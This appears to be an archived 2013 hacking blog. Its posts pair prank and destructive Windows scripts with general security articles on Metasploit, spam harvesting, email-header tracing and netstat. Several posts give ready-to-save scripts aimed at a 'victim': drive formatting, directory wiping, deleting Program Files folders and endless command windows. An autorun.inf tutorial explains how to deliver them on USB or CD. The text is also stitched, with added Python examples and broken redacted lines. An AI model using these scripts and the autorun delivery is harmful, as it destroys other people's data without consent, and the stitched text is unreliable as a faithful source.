
Tuesday, June 25, 2013

Toggle Caps Lock

This code toggles the Caps Lock key...quite annoying >.<

Copy the following code into notepad:

Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"

Save as Hackmimic_capslock.vbs

*Search this blog for autorun script and automate it.
Feel free to leave comments~

Monday, June 24, 2013

Hit Enter Key

This code sends the Enter key to the victim machine. It will stop after the computer restarts.

Copy the following code into notepad:

Set wshShell = wscript.CreateObject("WScript.Shell")
wscript.sleep 100
' {ENTER} is the SendKeys code for the Enter key
wshshell.sendkeys "{ENTER}"

Save as Hackmimic_enter.vbs

*Search this blog for autorun script and automate it.
Feel free to leave comments~

Sunday, June 23, 2013

Pop Out CD Drive

This code pops out all the CD drives of your victim; if there is more than one, it pops out all of them.
Quite stupid yet fun...restarting the PC will clear and stop the script.

Copy the following code into notepad:

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
If colCDROMs.Count >= 1 Then
    ' Eject every CD/DVD drive the Windows Media Player object can see
    For i = 0 To colCDROMs.Count - 1
        colCDROMs.Item(i).Eject
    Next
End If
wscript.sleep 5000

Save as Hackmimic_popout.vbs

*Search this blog for autorun script and automate it.
Feel free to leave comments~

Saturday, June 22, 2013

Remove Directory

When executed, this code deletes all directories and files in the specified directory. It works like delete/erase, but instead of one file at a time, the rd command removes the whole directory tree, leaving you with a fresh empty folder.

Copy the following code into notepad:

rd J:\ /s /q

Save as Hackmimic_rd.bat

Remove Directory Help

RMDIR [/S] [/Q] [drive:]path
RD [/S] [/Q] [drive:]path

    /S      Removes all directories and files in the specified directory
            in addition to the directory itself.  Used to remove a directory

    /Q      Quiet mode, do not ask if ok to remove a directory tree with /S

*Search this blog for autorun script and automate it.
Feel free to leave comments~

Friday, June 21, 2013

Format Drive

The following code formats the drive letter defined in it.

Copy the code below into notepad:

format D: /q /x

Save as Hackmimic_format.cmd

Good to go now...

*Replace D with any other drive letter
*You can add multiple lines for different disk drives
*Perform a test on a USB drive to check the result

Format Help

FORMAT volume [/FS:file-system] [/V:label] [/Q] [/A:size] [/C] [/X]
FORMAT volume [/V:label] [/Q] [/F:size]
FORMAT volume [/V:label] [/Q] [/T:tracks /N:sectors]
FORMAT volume [/V:label] [/Q]
FORMAT volume [/Q]

  volume          Specifies the drive letter (followed by a colon),
                  mount point, or volume name.
  /FS:filesystem  Specifies the type of the file system (FAT, FAT32, or NTFS).
  /V:label        Specifies the volume label.
  /Q              Performs a quick format.
  /C              NTFS only: Files created on the new volume will be compressed
                  by default.
  /X              Forces the volume to dismount first if necessary.  All opened
                  handles to the volume would no longer be valid.
  /A:size         Overrides the default allocation unit size. Default settings
                  are strongly recommended for general use.
                  NTFS supports 512, 1024, 2048, 4096, 8192, 16K, 32K, 64K.
                  FAT supports 512, 1024, 2048, 4096, 8192, 16K, 32K, 64K,
                  (128K, 256K for sector size > 512 bytes).
                  FAT32 supports 512, 1024, 2048, 4096, 8192, 16K, 32K, 64K,
                  (128K, 256K for sector size > 512 bytes).

                  Note that the FAT and FAT32 files systems impose the
                  following restrictions on the number of clusters on a volume:

                  FAT: Number of clusters <= 65526
                  FAT32: 65526 < Number of clusters < 4177918

                  Format will immediately stop processing if it decides that
                  the above requirements cannot be met using the specified
                  cluster size.

                  NTFS compression is not supported for allocation unit sizes
                  above 4096.

  /F:size         Specifies the size of the floppy disk to format (1.44)
  /T:tracks       Specifies the number of tracks per disk side.
  /N:sectors      Specifies the number of sectors per track.

*Search this blog for autorun script and automate it.
Feel free to leave comments~


Metasploit software helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments. Capabilities include smart exploitation, password auditing, web application scanning, and social engineering. Teams can collaborate in Metasploit and present their findings in consolidated reports. The goal of the software is to provide a clear understanding of the critical vulnerabilities in any environment and to manage those risks.

Here is a brief table of contents for Singh's book:

Chapter 1: Metasploit Quick Tips for Security Professionals covering: configuration, installation, basic use, and storing results in a database
Chapter 2: Information Gathering and Scanning covering: passive and active gathering, social engineering, scanning, Nessus, NeXpose, and Dradis
Chapter 3: Operating System-based Vulnerability Assessment covering: exploits, Windows XP, remote shells, Windows 2003, Windows 7, Linux, and DLL injection
Chapter 4: Client-side Exploitation and Antivirus bypass covering: IE, Word, Adobe Reader, payloads, and killing anti-virus
Chapter 5: Using Meterpreter to Explore the Compromised Target covering: Meterpreter commands, privilege escalation, communication channels, and snooping on Windows targets
Chapter 6: Advanced Meterpreter Scripting covering: hash dumps, back doors, pivoting, Railgun, pivoting, and killing firewalls
Chapter 7: Working with Modules for Penetration Testing covering: Auxiliary modules, admin modules, SQL injection, post-exploitation, and creating new modules
Chapter 8: Working with Exploits covering: mixins, msfvenom, going from exploit to Metasploit module, and fuzzing
Chapter 9: Working with Armitage covering: Getting started, information gathering, and targeting multiple machines
Chapter 10: Social Engineering Toolkit covering: Installation, configuration, spear-phishing, website attacks, and infectious media generation.

To summarize, if you are looking for a Metasploit book in cookbook format, then this book would be a good choice.


Thursday, June 20, 2013

Penetration Test

Penetration testing, in simple words, can be defined as a test carried out directly on live networks or servers by attacking them, performed by a trained ethical hacking professional or a network security administrator.

If you still can't get it, let me make it simpler for you. Consider an organization whose employees work on certain software. It stores all its data in some kind of "database server". What we do is hire an ethical-hacking-trained person, and he directly conducts the test on the possibly vulnerable areas of the system, the network or the software.

Classification of Penetration Testing

Penetration testing is basically classified according to what is known to the ethical hacker. It is classified as follows:

- White Box Testing
- Black Box Testing

In white box tests the ethical hacker physically sees the whole network, its previous data and its updates. That is, he knows everything before he performs the testing.

In black box testing the ethical hacker carries out a complete attack without even knowing the operating system on the network. So a black box test is the really hard thing to do in ethical hacking.

Wednesday, June 19, 2013

Delete Folder

This code deletes whatever is defined in it when executed.
Copy the following code into notepad without the quote:

"erase C:\Program Files\Common Files"

Save as "Hackmimic.cmd"

When executed, the Common Files folder inside Program Files will be permanently deleted.

For Testing

Create a text file on the C: drive
Name it hackmimic.txt
Use "erase C:\hackmimic.txt"

Erase Help

Deletes one or more files.

DEL [/P] [/F] [/S] [/Q] [/A[[:]attributes]] names
ERASE [/P] [/F] [/S] [/Q] [/A[[:]attributes]] names

  names         Specifies a list of one or more files or directories.
                Wildcards may be used to delete multiple files. If a
                directory is specified, all files within the directory
                will be deleted.

  /P            Prompts for confirmation before deleting each file.
  /F            Force deleting of read-only files.
  /S            Delete specified files from all subdirectories.
  /Q            Quiet mode, do not ask if ok to delete on global wildcard
  /A            Selects files to delete based on attributes
  attributes    R  Read-only files            S  System files
                H  Hidden files               A  Files ready for archiving
                -  Prefix meaning not

If Command Extensions are enabled DEL and ERASE change as follows:

The display semantics of the /S switch are reversed in that it shows
you only the files that are deleted, not the ones it could not find.

*Search this blog for autorun script and automate it.
Feel free to leave comments~

Autorun File

Create an autorun file that will execute other files when loaded.

Step by Step Tutorial

  1. Open notepad, type the following code inside.
  2. [AUTORUN]
     open=filename.extension
  3. Save as "autorun.inf"
  4. Finish. Simple, that's it!
So, what can we do with it?
Go back to step 2 and look at filename.extension: usually we put our simple script file there, such as shutdown.bat, format.cmd, etc.
Finally, copy both files onto a USB drive or CD and pass it to your victim. Watch the result.

Tuesday, June 18, 2013

How Spammers get your Email

Spam is amazing. In an unprecedented and astonishing effort, junk email reaches almost everybody online.
All it takes to get on the mailing lists used by spammers is an email address. There is no need to sign up for anything or ask for emails. The spam just starts coming, out of nowhere, apparently without any plan, and without a reason. It invades email addresses that are never used.

But how do spammers discover email addresses? How do they find your mailbox when your best friend does not?

Dictionary Attack

Big free email providers like Windows Live Hotmail or Yahoo! Mail are a spammer's paradise, at least when it comes to finding spammable addresses.

Millions of users share one common domain name, so you already know that ("" in the case of gmail). Try to sign up for a new account and you will discover that guessing an existing user name is not difficult either. Most short and good names are taken.

So, to find email addresses at a large ISP, it's enough to combine the domain name with a random user name. Chances are both "ethan1@hotmailcom" and "" exist.

To beat this kind of spammer attack, use long and difficult addresses.

Brute Searching Force

Another tactic employed by spammers to discover email addresses is to search common sources for email addresses. They have robots scanning web pages and following links.

These address harvesting bots work a lot like the search engines' robots, only they're not after the page content at all. Strings with '@' somewhere in the middle and a top-level domain at the end are all the spammers are interested in.

While not picky, the pages the spammers are particularly keen to visit are web forums, chat rooms and web-based interfaces to usenet because lots of email addresses are likely to be found there.

This is why you should

  • disguise your email address when you use it on the net or, better yet,
  • use disposable email addresses.

If you post your address on your own web page or blog, you can encode it so that visitors who want to send you an email can see and use it, but spambots cannot. Again, using a disposable address provides a very effective and at the same time convenient alternative.
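As an added example (not code from the original post), the Python below entity-encodes an address the way the "Encode it" advice suggests, then runs a harvester-style pattern like the one described above over the raw page source and again after entity decoding; the address and page are constructed placeholders. The second run shows the caveat: encoding only stops bots that never decode entities, which is why a disposable address is the more robust option.

```python
import html
import re

# Harvester-style pattern as the post describes it: something, an '@' in the
# middle and a top-level domain at the end. (Constructed for this example.)
HARVESTER_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def entity_encode(address: str) -> str:
    """Encode every character of an address as an HTML numeric character reference.

    A browser renders the result as the plain address, so human visitors can read
    and use it, but a bot that greps the raw page source never sees an '@'.
    """
    return "".join("&#%d;" % ord(ch) for ch in address)


def mailto_link(address: str) -> str:
    """Build a mailto: anchor whose href and visible text are both entity-encoded."""
    encoded = entity_encode(address)
    return '<a href="mailto:%s">%s</a>' % (encoded, encoded)


def harvest(page_source: str) -> list:
    """What a naive address-harvesting bot extracts from raw page source."""
    return HARVESTER_RE.findall(page_source)


def harvest_after_unescape(page_source: str) -> list:
    """What a slightly smarter bot extracts after decoding HTML entities first."""
    return HARVESTER_RE.findall(html.unescape(page_source))


# Constructed sample page for this example; the address is a placeholder.
ADDRESS = "webmaster@example.org"
PAGE = "<p>Contact: " + mailto_link(ADDRESS) + "</p>"

if __name__ == "__main__":
    print("raw source grep:      ", harvest(PAGE))                  # nothing found
    print("grep after unescape:  ", harvest_after_unescape(PAGE))   # address recovered
```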

Worms Turning Infested PCs Into Spam Zombies

To avoid being detected and filtered, spammers seek to send their emails from a distributed network of computers. Ideally, these computers are not even their own but those of unsuspecting users.

To build such a distributed network of spam zombies, spammers cooperate with virus authors who equip their worms with small programs that can send bulk emails.

Additionally, these spam sending engines will often scan the user's address book, web cache and files for email addresses. That's another chance for spammers to catch your address, and this one is particularly difficult to avoid.

The best anybody can do is

  • keeping their email program updated and patched,
  • being wary of any attachments they did not request, and
  • doing virus scans with a free, up-to-date scanner regularly.

Monday, June 17, 2013

Infinite Loop

This code will continuously show a message on the target machine until the victim manually closes it.
Copy the following code into notepad:
@ECHO off
msg * Gotcha! Say cheese...

This code will open up command prompt windows an infinite number of times, irritating the victim and affecting performance.
Copy the following code into notepad:
start cmd.exe


Save as Hackmimic_msg.bat, then you can open the file.

*You can replace the message after the echo tag with anything, separated by a space.
*You can put multiple echo lines as well.
*Search this blog for autorun script and automate it.
Feel free to leave comments~

Thursday, June 13, 2013

ASCII Description & Table


ASCII stands for American Standard Code for Information Interchange. Computers can only understand numbers, so an ASCII code is the numerical representation of a character such as 'a' or '@' or an action of some sort. ASCII was developed a long time ago and now the non-printing characters are rarely used for their original purpose. Below is the ASCII character table and this includes descriptions of the first 32 non-printing characters. ASCII was actually designed for use with teletypes and so the descriptions are somewhat obscure. If someone says they want your CV however in ASCII format, all this means is they want 'plain' text with no formatting such as tabs, bold or underscoring - the raw format that any computer can understand. This is usually so they can easily import the file into their own applications without issues. Notepad.exe creates ASCII text, or in MS Word you can save a file as 'text only'


Extended ASCII Table

Wednesday, June 12, 2013

Password Protect Google Chrome

Simple Startup Password is an add-on for the Google Chrome browser that blocks unauthorized people from using your browser. Just go to the extensions gallery of Google Chrome and install the Simple Startup Password add-on for your browser.
After installing the add-on go to Settings -> Tools -> Extensions. There look for Simple Startup Password and click on Options. Set a password for your browser and you are done. Now every time you start your Google Chrome browser it will ask you for the password, and if you fail to give the correct password your browser will be closed.

You can get this add on from Google Chrome’s extensions gallery.
Link : Simple Startup Password for Google Chrome

In case you forget your password there is no option to recover it. You will have to re-install the browser.

Trace Email

While sending or receiving an email, our browser uses two protocols:
SMTP (Simple Mail Transfer Protocol), port 25
POP (Post Office Protocol), port 110

Whenever you click the send button of your browser to send a mail, the mail first reaches the source mail server, from there it goes to the interim mail server(s), from there it moves to the destination mail server and at last to the destination inbox. So as you see it is not a complicated process and can be described by the following diagram: |Sender Outbox-----> Source Mail Server-----> Interim Mail Servers-----> Destination Mail Server------> Destination Inbox|

Emails do not travel alone; they carry an email header with them.
This email header reveals the path taken by the email to reach its

Tracing Time:

Here I will take a real-life example of an email that was sent to me.
The email header is:

From John Wed Jun 12 20:36:53 2013

X-Apparently-To: via; Wed, 12 Jun 2013 20:36:53 +0530

Return-Path: <>


X-Originating-IP: []

Received: from  (HELO (

by with SMTP; Wed, 12 Jun 2013 20:36:53 +0530

From: John <>

Subject:Stop paying for CDs.

Date: Wed, 12 Jun 2013 11:06:53 EDT

MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"

Before tracing, the first thing to do is to divide the header into blocks of 3-4 lines, and then I will explain each line to you.
So let's begin:

Date: Wed, 12 Jun 2013 11:06:53 EDT
This line tells us the date on which the mail was sent to me.

From: John <>
This line tells me the email address of the person who sent the mail.

This line tells us to whom the mail was sent; in this case it is my email.

Subject:Stop paying for CDs.
This line tells us the subject of the message.

X-Apparently-To: via; Wed, 12 Jun 2013 20:36:53 +0530
This line tells me that the message was sent to my email via on Wednesday, 12th June 2013.

Return-Path: <>
Again, this line tells me the email address of the person who sent me this mail.

This line tells me that the message was filtered by

X-Originating-IP: []
This line tells me the IP address of the person who sent me this email.

Received: from  (HELO (
by with SMTP; Wed, 12 Jun 2013 20:36:53 +0530
Again, this line tells us the IP address of the person who sent this mail, and it contains some SMTP commands which you will learn about in the next lesson.

MIME-Version: 1.0
This line tells me the software that the attacker used to send me the

Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"
This line tells me the type of the text the email used.
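The header walk-through above, as an added example that is not part of the original post: Python that pulls the Received: chain, the HELO name, the IP the receiving server recorded and X-Originating-IP out of a constructed message (all hosts, addresses and IPs are placeholders). It also picks the sender IP from the first Received: line stamped by a server you control, because every line below that one was written by someone else's server and can be forged.

```python
import email
import re
from typing import Optional

# Constructed sample message for this example. Hosts, addresses and IPs are
# documentation placeholders, not the values from the article's real header.
SAMPLE = """\
X-Apparently-To: me@example.com via 192.0.2.10; Wed, 12 Jun 2013 20:36:53 +0530
Return-Path: <john@example.net>
X-Originating-IP: [203.0.113.45]
Received: from mail.example.net (HELO mail.example.net) (203.0.113.45)
  by mta7.example.com with SMTP; Wed, 12 Jun 2013 20:36:53 +0530
Received: from [198.51.100.7] (helo=pc.example.net)
  by mail.example.net with esmtpa; Wed, 12 Jun 2013 11:06:50 -0400
From: John <john@example.net>
Subject: Stop paying for CDs.
Date: Wed, 12 Jun 2013 11:06:53 EDT
MIME-Version: 1.0
Content-Type: text/plain

(body)
"""

IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
HOP_RE = re.compile(r"from\s+(?P<from>.+?)\s+by\s+(?P<by>\S+)", re.IGNORECASE)


def parse_received(value: str) -> Optional[dict]:
    """Break one Received: header into the fields the article reads off it."""
    text = " ".join(value.split())            # unfold continuation lines
    m = HOP_RE.search(text)
    if not m:
        return None                           # other Received: styles, e.g. "(qmail ...)"
    from_part = m["from"]
    helo = (re.search(r"\(HELO\s+([^)\s]+)", from_part, re.IGNORECASE)
            or re.search(r"helo=([^)\s]+)", from_part, re.IGNORECASE))
    ip = IPV4_RE.search(from_part)
    return {
        "from": from_part.split()[0],         # name the sending host claimed
        "helo": helo.group(1) if helo else None,
        "ip": ip.group(1) if ip else None,    # address the receiving server actually saw
        "by": m["by"],                        # server that stamped this line
        "date": text.rsplit(";", 1)[1].strip() if ";" in text else None,
    }


def received_hops(raw: str) -> list:
    """All Received: lines, newest (topmost) first, the order the article reads them."""
    msg = email.message_from_string(raw)
    hops = [parse_received(v) for v in msg.get_all("Received", [])]
    return [h for h in hops if h]


def originating_ip(raw: str) -> Optional[str]:
    """X-Originating-IP as some webmail providers add it, with the brackets stripped."""
    value = email.message_from_string(raw).get("X-Originating-IP")
    return value.strip().strip("[]") if value else None


def sender_ip_seen_by(raw: str, trusted_servers: set) -> Optional[str]:
    """IP recorded by the first (topmost) Received: line stamped by a server we trust.

    Only the line our own mail server added is reliable: every Received: line
    below it was written by someone else's server and may be forged outright.
    """
    for hop in received_hops(raw):
        if hop["by"].lower() in trusted_servers and hop["ip"]:
            return hop["ip"]
    return None


if __name__ == "__main__":
    for hop in received_hops(SAMPLE):
        print("%-18s (HELO %s) ip=%s  by %s  at %s" % (
            hop["from"], hop["helo"], hop["ip"], hop["by"], hop["date"]))
    print("X-Originating-IP:", originating_ip(SAMPLE))
    print("sender IP as seen by our MTA:", sender_ip_seen_by(SAMPLE, {"mta7.example.com"}))
```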
The header can be viewed by going to Actions in Yahoo Mail; in Gmail it is found in settings. If you use some other website, the best way is to find out using Google. Now that you have got the IP address, what can you do?

The answer is very simple: you can just do a whois lookup for that IP address.
Whois is a tool that has information about all the hosts. When I did a whois lookup for the above IP address, it revealed the following information:



iMacros is an extension for the Mozilla Firefox, Google Chrome, and Internet Explorer web browsers which adds record and replay functionality similar to that found in web testing and form filler software. The macros can be combined and controlled via JavaScript. Demo macros and JavaScript code examples are included with the software. iMacros was developed by iOpus. First released in 2001, iMacros was the first macro recorder tool specifically designed and optimized for web browsers and form filling.
iMacros for Firefox and Chrome offers a feature known as social scripting. It allows users to share macros and scripts in a way that is similar to how they share bookmarks on the many social bookmarking websites. After creating a new macro, users can click just once to share it with their friends as a link, either by distributing the link via email and social bookmarking websites, or by embedding it in a website or blog for public access. Technically, this is accomplished by embedding the imacro and the controlling JavaScript inside a plain text link.

Along with the freeware version, iMacros is available as a proprietary commercial application, with additional features and support for web scripting, web scraping, internet server monitoring, and web testing. In addition to working with HTML pages, the commercial editions can automate Adobe Flash, Adobe Flex, Silverlight, and Java applets by using Directscreen and image recognition technology.
Advanced versions also contain a command-line interface and an application programming interface (API) to automate more complicated tasks and integrate with other programs or scripts. The iMacros API is called Scripting Interface. The Scripting Interface of the iMacros Scripting Edition is designed as a Component Object Model (COM) object and allows the user to remotely control (script) the iMacros Browser, Internet Explorer, and Firefox from any Windows programming or scripting language.

Friday, June 7, 2013

Track Down a Hacker

Sometimes, it's just not enough to simply know that there's a Trojan or Virus onboard. Sometimes you need to know exactly why that file is on-board, how it got there - but most importantly, who put it there.
By enumerating the attacker in the same way that they have enumerated the victim, you will be able to see the bigger picture and establish what you're up against.

Connections make the world go round

The computer world, at any rate. Every single time you open up a website, send an email or upload your webpages into cyberspace, you are connecting to another machine in order to get the job done. This, of course, presents a major problem, because this simple act is what allows malicious users to target a machine in the first place. 

# How do these people find their victim? 
Well, first of all, they need to get hold of the victim's IP Address. Your IP (Internet Protocol) address reveals your point of entry to the Internet and can be used in many ways to cause your online activities many, many problems. It may not reveal you by name, but it may be uniquely identifiable and it represents your digital ID while you are online (especially so if you're on a fixed IP / DSL etc). 

With an IP address, a Hacker can find out all sorts of weird and wonderful things about their victim (as well as causing all kinds of other trouble, the biggest two being Portnukes/Trojans and the dreaded DoS ((Denial of Service)) attack). Some Hackers like to collect IP Addresses like badges, and like to go back to old targets, messing them around every so often. An IP address is incredibly easy to obtain - until recently, many realtime chat applications (such as MSN) were goldmines of information. Your IP Address is contained as part of the Header Code on all emails that you send and webpages that you visit can store all kinds of information about you. 

A common trick is for the Hacker to go into a Chatroom, paste his supposed website address all over the place, and when the unsuspecting victim visits, everything about your computer from the operating system to the screen resolution can be logged...and, of course, the all important IP address. In addition, a simple network-wide port scan will reveal vulnerable target machines, and a war-dialler will scan thousands of lines for exposed modems that the hacker can exploit. 

So now that you know some of the basic dangers, you're probably wondering how these people connect to a victim's machine? 

Virtual and Physical Ports

Everything that you receive over the Internet comes as a result of other machines connecting to your computer's ports. You have two types: physical ports are the holes in the back of your machine, but the important ones are virtual. These allow transfer of data between your computer and the outside world, some with allocated functions, some without, but knowing how these work is the first step to discovering who is attacking you; you simply MUST have a basic knowledge of this, or you won't get much further.

What do the phrases TCP/UDP actually mean?

TCP/IP stands for Transmission Control Protocol and Internet Protocol, a TCP/IP packet is a block of data which is compressed, then a header is put on it and it is sent to another computer (UDP stands for User Datagram Protocol). This is how ALL internet transfers occur, by sending packets. The header in a packet contains the IP address of the one who originally sent you it. Now, your computer comes with an excellent (and free) tool that allows you to see anything that is connected (or is attempting to connect) to you, although bear in mind that it offers no blocking protection; it simply tells you what is going on, and that tool is NETSTAT. 

Netstat: Your first line of defence

Netstat is a very fast and reliable method of seeing exactly who or what is connected (or connecting) to your computer. Open up DOS (Start/Programs/MS-DOS Prompt on most systems), and in the MSDOS Prompt, type: 

netstat -a 
(make sure you include the space in between the "t" and the "a").
If you're connected to the Internet when you do this, you should see something like: 

Active Connections 
Proto Local Address Foreign Address State 
TCP macintosh: 20034 50505 ESTABLISHED 
TCP macintosh: 80 proxy.webcache.eng.sq: 30101 TIME_WAIT 

Now, "Proto(col)" simply means what kind of data transmission is taking place (TCP or UDP), "Local address" is your computer (and the number next to it tells you what port you're connected on), "Foreign Address" is the machine that is connected to you (and what port they're using), and finally "State" is simply whether or not a connection is actually established, or whether the machine in question is waiting for a transmission, or timing out etc. 

Now, you need to know all of Netstat's various commands, so type: 

netstat ? 

You will get something like this: 
Displays protocol statistics and current TCP/IP network connections. 
NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval] 
-a Displays all connections and listening ports. 
-e Displays Ethernet statistics. This may be combined with the -s option. 
-n Displays addresses and port numbers in numerical form. 
-p proto Shows connections for the protocol specified by proto; proto may be TCP or UDP. If used with the -s option to display per-protocol statistics, proto may be TCP, UDP, or IP. 
-r Displays the routing table. 
-s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the -p option may be used to specify a subset of the default. 

Have a play around with the various options, but the most important use of these methods is when you combine them. The best command to use is 

netstat -an 

because this will list all connections in Numerical Form, which makes it a lot easier to trace malicious users....Hostnames can be a little confusing if you don't know what you're doing (although they're easily understandable, as we shall see later). Also, by doing this, you can also find out what your own IP address is, which is always useful. 

netstat -b 
will tell you what ports are open and what programs are connecting to the internet. 

Types of Port

It would be impossible to find out who was attacking you if computers could just access any old port to perform an important function; how could you tell a mail transfer from a Trojan Attack? Well, good news, because your regular, normal connections are assigned to low, commonly used ports, and in general, the higher the number used, the more you should be suspicious. Here are the three main types of port: 

# Well Known Ports These run from 0 to 1023, and are bound to the common services that run on them (for example, mail runs on channel 25 tcp/udp, which is smtp (Simple Mail Transfer Protocol) so if you find one of these ports open (and you usually will), it's usually because of an essential function. 

# Registered Ports These run on 1024 to 49151. Although not bound to a particular service, these are normally used by networking utilities like FTP software, Email client and so on, and they do this by opening on a random port within this range before communicating with the remote server, so don't panic (just be wary, perhaps) if you see any of these open, because they usually close automatically when the system that's running on them terminates (for example, type in a common website name in your browser with netstat open, and watch as it opens up a port at random to act as a buffer for the remote servers). Services like MSN Messenger and ICQ usually run on these Ports. 

# Dynamic/Private Ports Ranging from 49152 to 65535, these things are rarely used except with certain programs, and even then not very often. This is indeed the usual range of the Trojan, so if you find any of these open, be very suspicious. So, just to recap: 

Well Known Ports 0 to 1023 Commonly used, little danger. 
Registered Ports 1024 to 49151 Not as common, just be careful. 
Dynamic/Private Ports 49152 to 65535 Be extremely suspicious. 

The hunt is on

Now, it is essential that you know what you're looking for, and the most common way someone will attack your machine is with a Trojan. This is a program that is sent to you in an email, or attempts to bind itself to one of your ports, and when activated, it can give the user your passwords, access to your hard drive...they can even make your CD Tray pop open and shut. At the end of this Document, you will find a list of the most commonly used Trojans and the ports they operate on. For now, let's take another look at that first example of Netstat.... 

Active Connections 
Proto Local Address Foreign Address State 
TCP macintosh: 27374 50505 ESTABLISHED 
TCP macintosh: 80 proxy.webcache.eng.sq: 30101 TIME_WAIT 

Now, straight away, this should make more sense to you. Your computer is connected on two ports, 80 and 27374. Port 80 is used for http/www transmissions (i.e. for all intents and purposes, it's how you connect to the net, although of course it's a lot more complicated than that). Port 27374, however, is distinctly suspicious; first of all, it is in the registered port range, and although other services (like MSN) use these, let's assume that you have nothing at all running like instant messengers, webpages etc....you're simply connected to the net through a proxy.

So, now this connection is looking even more troublesome, and when you realise that 27374 is a common port for Netbus (a potentially destructive Trojan), you can see that something is untoward here. So, what you would do is: 

1) Run Netstat, and use:
Netstat -a
Netstat -an
so you have both hostnames AND IP addresses.
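As an added example, not code from the original post: Python that parses constructed Windows netstat -an output and applies the three port classes from the recap above. It goes one step beyond the text for ESTABLISHED connections: on current Windows versions ordinary outbound connections take a local port from the 49152-65535 range, so only an unexpected listener, or a connection this machine is serving on a registered port (the 27374 case), is flagged.

```python
import re

# Port classes exactly as the recap table defines them.
WELL_KNOWN_MAX = 1023
REGISTERED_MAX = 49151


def port_class(port: int) -> str:
    """Classify a port number with the article's three ranges."""
    if port <= WELL_KNOWN_MAX:
        return "well-known"
    if port <= REGISTERED_MAX:
        return "registered"
    return "dynamic/private"


# One row of Windows `netstat -an`: proto, local addr:port, foreign addr:port, optional state.
ROW_RE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<laddr>\S+):(?P<lport>\d+)\s+"
    r"(?P<faddr>\S+):(?P<fport>\d+|\*)(?:\s+(?P<state>[A-Z_]+))?\s*$"
)


def parse_netstat(output: str) -> list:
    """Turn raw netstat -an text into a list of dicts; header and blank lines are skipped."""
    rows = []
    for line in output.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        rows.append({
            "proto": m["proto"],
            "laddr": m["laddr"],
            "lport": int(m["lport"]),
            "faddr": m["faddr"],
            "fport": None if m["fport"] == "*" else int(m["fport"]),
            "state": m["state"] or "",
        })
    return rows


def assess(row: dict) -> tuple:
    """Return (verdict, reason) for one row, using the article's rule that the higher
    the port your machine is bound to, the more suspicious it is."""
    lc = port_class(row["lport"])
    state = row["state"]
    if state == "LISTENING":
        if lc == "well-known":
            return ("expected", "listener on well-known port %d" % row["lport"])
        return ("suspicious", "unexpected listener on %s port %d" % (lc, row["lport"]))
    if state == "ESTABLISHED":
        if lc == "dynamic/private":
            # Our side picked an ephemeral port (49152-65535 on current Windows):
            # an ordinary outbound client connection, e.g. a browser talking to port 80.
            return ("expected", "outbound client connection to foreign port %s" % row["fport"])
        if lc == "well-known":
            return ("expected", "inbound connection to standard service port %d" % row["lport"])
        # Local port in the registered range while the remote side sits on an ephemeral
        # port: this machine is the *server* side of the connection, on a port no standard
        # service claims. This is the 27374 case the article walks through.
        return ("suspicious", "serving an inbound connection on registered port %d" % row["lport"])
    return ("info", "state %s" % (state or "n/a"))


def flagged(output: str) -> list:
    """Rows whose verdict is 'suspicious', with the reason attached."""
    result = []
    for row in parse_netstat(output):
        verdict, reason = assess(row)
        if verdict == "suspicious":
            result.append(dict(row, reason=reason))
    return result


# Constructed sample output for this example (documentation placeholder addresses).
SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:27374          0.0.0.0:0              LISTENING
  TCP    192.168.1.5:27374      198.51.100.23:50505    ESTABLISHED
  TCP    192.168.1.5:49731      203.0.113.9:80         ESTABLISHED
  UDP    0.0.0.0:137            *:*
"""

if __name__ == "__main__":
    for row in parse_netstat(SAMPLE):
        verdict, reason = assess(row)
        print("%-4s %s:%d -> %s  [%s] %s" % (
            row["proto"], row["laddr"], row["lport"], row["faddr"], verdict, reason))
```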


Having the attacker's IP is all well and good, but what can you do with it? The answer is, a lot more! It's not enough to have the address; you also need to know where the attacker's connections are coming from. You may have used automated tracerouting tools before, but do you know how they work?

Go back to MSDOS and type 

tracert *type IP address/Hostname here* 

Now, what happens is, the traceroute will show you all the routers in between you and the target machine, including hops that don't answer (usually a firewall, or a router that drops the probes). More often than not, the hostname listed before the final one will belong to the hacker's ISP. It'll either say who the ISP is somewhere in there, or else you run a second trace on that IP/hostname to see who the ISP in question is. 

If the Hostname that you get back doesn't actually seem to mention an actual geographical location within its text, you may think all is lost. But fear not! Suppose you get a hostname such as 

Well, that tells us nothing, right? Wrong....simply enter the hostname in your browser, and though many times you will get nothing back, sometimes it will resolve to an ISP, and from there you can easily find out its location and in what areas they operate. This at least gives you a firm geographical location to carry out your investigations in. 

If you STILL have nothing, as a last resort you COULD try connecting to your target's ISP's port 13 (the daytime service) by Telnet. If it answers at all, it prints the server's local time, which tells you roughly how many hours ahead or behind GMT the ISP is, thus giving you a geographical trace based on the time mentioned (although bear in mind, the ISP may be doing something stupid like not having their clocks set correctly, giving you a misleading trace, and most servers today don't run daytime at all. Similarly, a common tactic of hackers is to deliberately have their computer's clock set to a totally wrong time, so as to throw you off the scent). Also, unless you know what you're doing, I wouldn't advise using Telnet (which is outside the parameters of this tutorial). 

Reverse DNS Query

This is probably the most effective way of running a trace on somebody. If ever you're in a chatroom and you see someone saying that they've "hacked into a satellite orbiting the Earth, and are taking pictures of your house right now", ignore them because that's just bad movie nonsense. THIS method is the way to go with regard to finding out what country (maybe even what state/city) someone resides in, although it's actually almost impossible to find an EXACT geographical location without actually breaking into their ISP's head office and running off with the safe. 

To run an rDNS query, simply go back to MS-DOS and type 
netstat (without the -n switch) and hit return. Netstat then does a reverse lookup on every foreign address, so active connections are shown as hostnames rather than in numerical format. 


